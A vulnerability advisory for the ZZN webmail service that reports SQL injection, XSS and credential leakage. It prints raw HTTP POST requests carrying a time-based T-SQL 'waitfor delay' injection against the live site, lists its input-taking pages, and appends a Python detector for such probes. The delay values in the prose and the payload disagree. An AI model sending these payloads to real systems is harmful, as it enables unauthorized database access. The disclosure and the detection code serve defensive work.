Release date:
Updated on:
Affected Systems:
Zzn
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2007-0177
ZZN is a VM email service.
ZZN has multiple XSS, remote blind SQL injection, and credential leakage vulnerabilities. These vulnerabilities can allow remote attackers to perform unauthorized database operations.
<* Source: Juan Carlos García
Link: http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
1 - URL-encoded POST input company was set to x'; waitfor delay '0:0:4' --
POST /apsarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540123160.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

BeenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=
2 - URL-encoded POST input company was set to x'; waitfor delay '0:0:4' --
POST /apsarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540123160.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

BeenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=
Proof Of Concept
----------------
These files have at least one input (GET or POST).
/Membersarea_en/home.asp - 3 inputs
/Membersarea_en/joinframes.asp - 2 inputs
/Membersarea_en/emailaccount.asp - 4 inputs
/Membersarea_en/preminder.asp - 1 input
/Membersarea_en/signup.asp - 2 inputs
/Membersarea_en/support.asp - 1 input
/Membersarea_en/insidelogin.asp - 2 inputs
/Membersarea_en/directemailerror.asp - 1 input
/Membersarea_en/alertwindow.asp - 1 input
/Membersarea_en/loginerror.asp - 1 input
/Membersarea_en/support_abuse.asp - 1 input
/Membersarea_en/copy%20of%20emailaccount.asp - 1 input
/Membersarea_en/directregister.asp - 1 input
/Zlog - 1 input
/Zlog/blog_error.asp - 1 input
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Zzn
---
The vendor has not yet provided a patch or upgrade. Users of the software should watch the vendor's homepage for the latest version:
http://www.zzn.com
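
With no vendor patch available, one way to detect the time-delay probe shown in the test method is to decode submitted form bodies and flag fields containing the T-SQL WAITFOR DELAY construct. The Python below is an added example, not part of the original advisory or the vendor's code; the function names, the sample bodies and the choice of regular expressions are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Whitespace between T-SQL keywords may be replaced by inline comments.
_GAP = r"(?:\s|/\*.*?\*/)"
# WAITFOR DELAY followed by an h:m:s literal, the construct used in the probe.
WAITFOR = re.compile(
    r"waitfor" + _GAP + r"+delay" + _GAP + r"*'?\s*\d{1,2}\s*:\s*\d{1,2}\s*:\s*\d{1,2}",
    re.IGNORECASE | re.DOTALL,
)
# Quote followed by a semicolon: string break-out ahead of a stacked statement.
BREAKOUT = re.compile(r"'\s*;")
MAX_DECODE_ROUNDS = 3  # bound on repeated decoding of double-encoded values


def fully_decode(value: str) -> str:
    """URL-decode repeatedly (bounded) so %2527-style double encoding is seen."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_form_body(body: str) -> list[tuple[str, str]]:
    """Return (parameter, reason) for each form field that looks like a delay probe."""
    findings = []
    # parse_qsl performs the first round of URL decoding on each value.
    for name, value in parse_qsl(body, keep_blank_values=True):
        text = fully_decode(value)
        if WAITFOR.search(text):
            reason = "waitfor-delay"
            if BREAKOUT.search(text):
                reason += "+quote-breakout"
            findings.append((name, reason))
    return findings


if __name__ == "__main__":
    # Constructed sample bodies (assumptions, not captured traffic).
    for body in ("company=Acme+Ltd&Phone=555-666-0606",
                 "company=x%27%3b%20waitfor%20delay%20%270%3a0%3a4%27--&Email=a@b.tst"):
        print(scan_form_body(body))
```

A match is a signal for alerting or blocking at a proxy or WAF layer; it does not replace fixing the query in the application with parameterized statements.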